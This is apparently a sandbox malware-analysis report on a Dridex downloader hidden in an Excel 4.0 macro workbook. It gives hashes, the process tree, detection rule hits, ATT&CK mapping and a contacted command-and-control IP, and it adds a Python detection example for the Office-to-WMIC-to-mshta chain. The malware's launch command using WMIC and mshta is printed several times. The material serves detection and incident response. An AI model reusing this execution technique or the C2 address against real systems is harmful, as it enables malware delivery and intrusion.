
Windows Analysis Report request-0132311.xlsb

Overview

General Information

Sample Name: request-0132311.xlsb
Analysis ID: 528517
MD5: 1479f6bfc2c47932d8eee6cf4db5c7f4
SHA1: 7594bd2fb1fa9005662ece3c490fe80d28463e2c
SHA256: 38e36a6b7bf101f5a8ddfb13756b8975413c91bad1828f83258afa6e564f1c32
Tags: Dridex, xlsx

Detection

Hidden Macro 4.0 Dridex Downloader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Dridex Downloader
Found malicious Excel 4.0 Macro
Creates and opens a decoy document (probably to hide the exploitation from the user)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
IP address seen in connection with other malware

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6280 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 6188 cmdline: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 4988 cmdline: mshta C:\ProgramData\vULADISfrveNTj.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | -

Dropped Files

Source | Rule | Description | Author | Strings
C:\ProgramData\vULADISfrveNTj.rtf | JoeSecurity_DridexDownloader | Yara detected Dridex Downloader | Joe Security | -

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  Command: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"
  CommandLine: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"
  CommandLine|base64offset|contains: h
  Image: C:\Windows\SysWOW64\wbem\WMIC.exe
  NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe
  OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe
  ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
  ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
  ParentProcessId: 6280
  ProcessCommandLine: wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"
  ProcessId: 6188

Sigma detected: Suspicious WMI Execution
Source: Process started
Author: Michael Haag, Florian Roth, juju4, oscd.community
Data: the same process-start event as above (ProcessId 6188, ParentProcessId 6280, identical command line and image fields)
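Both Sigma hits key on the same process-start event: EXCEL.EXE is the parent, WMIC.exe is the child, and the command line asks WMI to create a new process. The Python below is an added example (not Joe Sandbox's or the Sigma project's code) that reproduces the matching logic of those two rules in abbreviated form and adds a third check a responder would want here: mshta.exe being handed a file that is not a .hta (the dropped .rtf in ProgramData). The events are constructed from this report's process tree; the WmiPrvSE.exe parent for PID 4988 and the benign PID 7001 event are assumptions, since the report shows neither.

```python
"""Process-creation checks for the Office -> WMIC -> mshta chain in this
report. Added example; it is not Joe Sandbox or Sigma code, and the image
lists are abbreviated versions of what the cited Sigma rules use."""
import ntpath
from typing import Dict, List, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                 "mspub.exe", "visio.exe", "outlook.exe"}
# shells and LOLBins an Office process has no business launching
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "wmic.exe", "rundll32.exe",
                "regsvr32.exe", "msiexec.exe", "certutil.exe", "schtasks.exe"}


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def office_spawns_shell(ev: Dict[str, str]) -> bool:
    """Logic of 'Microsoft Office Product Spawning Windows Shell': an Office
    parent directly creating a shell/LOLBin child."""
    return (_base(ev.get("ParentImage", "")) in OFFICE_IMAGES
            and _base(ev.get("Image", "")) in SHELL_IMAGES)


def suspicious_wmi_exec(ev: Dict[str, str]) -> bool:
    """Logic of 'Suspicious WMI Execution': wmic.exe invoking
    Win32_Process::Create from the command line ('process call create')."""
    cmd = ev.get("CommandLine", "").lower()
    return (_base(ev.get("Image", "")) == "wmic.exe"
            and "process" in cmd and "call" in cmd and "create" in cmd)


def mshta_non_hta_target(ev: Dict[str, str]) -> bool:
    """mshta.exe handed a file that is not a .hta (here an .rtf in ProgramData).
    mshta does not care about the extension; it runs the script inside."""
    if _base(ev.get("Image", "")) != "mshta.exe":
        return False
    for tok in ev.get("CommandLine", "").split()[1:]:
        tok = tok.strip('"').lower()
        if "." in ntpath.basename(tok) and not tok.endswith(".hta"):
            return True
    return False


RULES = {
    "office_spawns_shell": office_spawns_shell,
    "suspicious_wmi_exec": suspicious_wmi_exec,
    "mshta_non_hta_target": mshta_non_hta_target,
}


def evaluate(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (ProcessId, [rules that fired]) for every event that matched."""
    hits = []
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits.append((int(ev["ProcessId"]), fired))
    return hits


# Events constructed from the report's process tree. WmiPrvSE.exe as the
# parent of PID 4988 is an assumption (WMI-created processes are parented by
# the WMI provider host; the report shows no parent). PID 7001 is a made-up
# benign wmic invocation to show the rules stay quiet on ordinary use.
EVENTS = [
    {"ProcessId": "6188", "Image": r"C:\Windows\SysWOW64\wbem\WMIC.exe",
     "CommandLine": r'wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"',
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"},
    {"ProcessId": "3620", "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "ParentImage": r"C:\Windows\SysWOW64\wbem\WMIC.exe"},
    {"ProcessId": "4988", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta C:\ProgramData\vULADISfrveNTj.rtf",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"ProcessId": "7001", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for pid, fired in evaluate(EVENTS):
        print(pid, ", ".join(fired))
```

Note what the parent/child rule misses: the mshta process (PID 4988) is not a child of EXCEL.EXE at all, because WMI created it, which is exactly why the report's process tree shows it at the top level. The WMI rule on the wmic.exe command line and the mshta argument check are what tie that process back to the document.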

Jbx Signature Overview

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Source: global traffic | TCP traffic: 192.168.2.5:49781 -> 136.144.181.174:8080
Source: global traffic | TCP traffic: 192.168.2.5:49781 -> 136.144.181.174:8080
Source: Joe Sandbox View | IP Address: 136.144.181.174
Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.181.174
Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.181.174
Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.181.174
Source: DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.dr | String found in binary or memory. The URLs below are the standard set of service endpoints (store, licensing, add-in, telemetry, sign-in and feedback) that Office binaries embed, carried here in a file dropped by EXCEL.EXE itself; none of them is the sample's own infrastructure. The only contact attributable to the sample in this analysis is 136.144.181.174:8080 above, reached without a DNS lookup.
  http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
  http://weather.service.msn.com/data.aspx
  https://addinsinstallation.store.office.com/app/acquisitionlogging
  https://addinsinstallation.store.office.com/app/download
  https://addinsinstallation.store.office.com/appinstall/preinstalled
  https://addinsinstallation.store.office.com/appinstall/unauthenticated
  https://addinslicensing.store.office.com/commerce/query
  https://addinslicensing.store.office.com/entitlement/query
  https://addinslicensing.store.office.com/orgid/apps/remove
  https://addinslicensing.store.office.com/orgid/entitlement/query
  https://analysis.windows.net/powerbi/api
  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  https://api.aadrm.com
  https://api.aadrm.com/
  https://api.addins.omex.office.net/appinfo/query
  https://api.addins.omex.office.net/appstate/query
  https://api.addins.store.office.com/addinstemplate
  https://api.addins.store.office.com/app/query
  https://api.addins.store.officeppe.com/addinstemplate
  https://api.cortana.ai
  https://api.diagnostics.office.com
  https://api.diagnosticssdf.office.com
  https://api.microsoftstream.com/api/
  https://api.office.net
  https://api.onedrive.com
  https://api.powerbi.com/beta/myorg/imports
  https://api.powerbi.com/v1.0/myorg/datasets
  https://api.powerbi.com/v1.0/myorg/groups
  https://apis.live.net/v5.0/
  https://arc.msn.com/v4/api/selection
  https://asgsmsproxyapi.azurewebsites.net/
  https://augloop.office.com
  https://augloop.office.com/v2
  https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
  https://autodiscover-s.outlook.com/
  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
  https://cdn.entity.
  https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
  https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
  https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
  https://client-office365-tas.msedge.net/ab
  https://clients.config.office.net/
  https://clients.config.office.net/user/v1.0/android/policies
  https://clients.config.office.net/user/v1.0/ios
  https://clients.config.office.net/user/v1.0/mac
  https://clients.config.office.net/user/v1.0/tenantassociationkey
  https://cloudfiles.onenote.com/upload.aspx
  https://config.edge.skype.com
  https://config.edge.skype.com/config/v1/Office
  https://config.edge.skype.com/config/v2/Office
  https://cortana.ai
  https://cortana.ai/api
  https://cr.office.com
  https://dataservice.o365filtering.com
  https://dataservice.o365filtering.com/
  https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
  https://dev.cortana.ai
  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
  https://dev0-api.acompli.net/autodetect
  https://devnull.onenote.com
  https://directory.services.
  https://ecs.office.com/config/v2/Office
  https://enrichment.osi.office.net/
  https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
  https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
  https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
  https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
  https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
  https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
  https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
  https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
  https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
  https://entitlement.diagnostics.office.com
  https://entitlement.diagnosticssdf.office.com
  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
  https://globaldisco.crm.dynamics.com
  https://graph.ppe.windows.net
  https://graph.ppe.windows.net/
  https://graph.windows.net
  https://graph.windows.net/
  https://hubblecontent.osi.office.net/contentsvc/api/telemetry
  https://hubblecontent.osi.office.net/contentsvc/browse?
  https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
  https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
  https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
  https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
  https://hubblecontent.osi.office.net/contentsvc/microsofticon?
  https://incidents.diagnostics.office.com
  https://incidents.diagnosticssdf.office.com
  https://inclient.store.office.com/gyro/client
  https://inclient.store.office.com/gyro/clientstore
  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
  https://insertmedia.bing.office.net/odc/insertmedia
  https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
  https://lifecycle.office.com
  https://login.microsoftonline.com/
  https://login.windows-ppe.net/common/oauth2/authorize
  https://login.windows.local
  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
  https://login.windows.net/common/oauth2/authorize
  https://loki.delve.office.com/api/v1/configuration/officewin32/
  https://lookup.onenote.com/lookup/geolocation/v1
  https://management.azure.com
  https://management.azure.com/
  https://messaging.office.com/
  https://metadata.templates.cdn.office.net/client/log
  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  https://ncus.contentsync.
  https://ncus.pagecontentsync.
  https://o365auditrealtimeingestion.manage.office.com
  https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
  https://o365diagnosticsppe-web.cloudapp.net
  https://ocos-office365-s2s.msedge.net/ab
  https://ofcrecsvcapi-int.azurewebsites.net/
  https://officeapps.live.com
  https://officeci.azurewebsites.net/api/
  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
  https://officesetup.getmicrosoftkey.com
  https://ogma.osi.office.net/TradukoApi/api/v1.0/
  https://omex.cdn.office.net/addinclassifier/officeentities
  https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
  https://omex.cdn.office.net/addinclassifier/officesharedentities
  https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
  https://onedrive.live.com
  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
  https://onedrive.live.com/embed?
  https://osi.office.net
  https://otelrules.azureedge.net
  https://outlook.office.com
  https://outlook.office.com/
  https://outlook.office.com/autosuggest/api/v1/init?cvid=
  https://outlook.office365.com
  https://outlook.office365.com/
  https://outlook.office365.com/api/v1.0/me/Activities
  https://outlook.office365.com/autodiscover/autodiscover.json
  https://ovisualuiapp.azurewebsites.net/pbiagave/
  https://pages.store.office.com/appshome.aspx?productgroup=Outlook
  https://pages.store.office.com/review/query
  https://pages.store.office.com/webapplandingpage.aspx
  https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
  https://portal.office.com/account/?ref=ClientMeControl
  https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
  https://powerlift-frontdesk.acompli.net
  https://powerlift.acompli.net
  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
  https://prod-global-autodetect.acompli.net/autodetect
  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
  https://res.getmicrosoftkey.com/api/redemptionevents
  https://roaming.edog.
  https://rpsticket.partnerservices.getmicrosoftkey.com
  https://settings.outlook.com
  https://shell.suite.office.com:1443
  https://skyapi.live.net/Activity/
  https://sr.outlook.office.net/ws/speech/recognize/assistant/work
  https://staging.cortana.ai
  https://storage.live.com/clientlogs/uploadlocation
  https://store.office.cn/addinstemplate
  https://store.office.de/addinstemplate
  https://substrate.office.com/search/api/v1/SearchHistory
  https://substrate.office.com/search/api/v2/init
  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  https://tasks.office.com
  https://uci.cdn.office.net/mirrored/smartlookup/current/
  https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
  https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
  https://visio.uservoice.com/forums/368202-visio-on-devices
  https://web.microsoftstream.com/video/
  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
  https://webshell.suite.office.com
  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
  https://wus2.contentsync.
  https://wus2.pagecontentsync.
  https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
  https://www.odwebp.svc.ms

E-Banking Fraud:

Yara detected Dridex Downloader
Source: Yara match | File source: C:\ProgramData\vULADISfrveNTj.rtf, type: DROPPED

      System Summary:

      Found malicious Excel 4.0 Macro
      Source: request-0132311.xlsb | Macro extractor: Sheet: Macro1 contains: mshta
      Found Excel 4.0 Macro with suspicious formulas
      Source: request-0132311.xlsb | Initial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheet
      Source: request-0132311.xlsb | Initial sample: Sheet name: Macro1
      Contains functionality to create processes via WMI
      Source: WMIC.exe, 00000015.00000002.353118555.0000000002570000.00000004.00000020.sdmp | Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
      Found obfuscated Excel 4.0 Macro
      Source: request-0132311.xlsb | Macro extractor: Sheet: Macro1 high usage of CHAR() function: 48
      Source: request-0132311.xlsb | Macro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vULADISfrveNTj.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vULADISfrveNTj.rtf
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{5FBAAE12-9FD1-43FF-805E-E46E2BC0693B} - OProcSessId.dat
      Source: classification engine | Classification label: mal92.troj.expl.evad.winXLSB@5/6@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: request-0132311.xlsb | Initial sample: OLE zip file path = xl/media/image2.png
      Source: request-0132311.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
      Source: request-0132311.xlsb | Initial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

      Persistence and Installation Behavior:

      Creates processes via WMI
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      Creates and opens a fake document (probably a fake document to hide exploiting)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: cmd line: vuladisfrventj.rtf
      Source: unknown | Process created: cmd line: vuladisfrventj.rtf
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (18 identical entries)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX (4 identical entries)
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: Yara match | File source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmp | Binary or memory string: Progman
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
      Source: mshta.exe, 00000017.00000002.510194282.000001F0C4280000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
      Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation

      Mitre Att&ck Matrix

      Techniques are listed per tactic column, in the row order of the original matrix; a trailing ^n reproduces the superscript number the report shows beside a technique.

      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
      Execution: Windows Management Instrumentation^21; Scripting^4; Exploitation for Client Execution^31; At (Windows)
      Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
      Privilege Escalation: Process Injection^2; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
      Defense Evasion: Masquerading^1; Process Injection^2; Scripting^4; Binary Padding
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
      Discovery: Query Registry^1; Process Discovery^1; File and Directory Discovery^1; System Information Discovery^14
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
      Collection: Email Collection^1; Data from Removable Media; Data from Network Shared Drive; Input Capture
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
      Command and Control: Non-Standard Port^1; Junk Data; Steganography; Protocol Impersonation
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
      Impact: Modify System Partition; Device Lockout; Delete Device Data

      Behavior Graph


      Screenshots


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

                                                                                                                                  https://api.powerbi.com/beta/myorg/importsDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/macDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.aiDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.comDE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ovisualuiapp.azurewebsites.net/pbiagave/DE7D65F3-0B6C-4254-99C5-DE6FA9EA184E.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs


                                                                                                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
136.144.181.174 | unknown | Netherlands | 20857 | TRANSIP-AS Amsterdam, the Netherlands, NL | false

                                                                                                                                                    General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528517
Start date: 25.11.2021
Start time: 12:45:33
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 12s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: request-0132311.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.troj.expl.evad.winXLSB@5/6@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active AutoShape Object
• Active Picture Object
• Active Picture Object
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.109.32.63, 52.109.8.25, 52.109.12.23
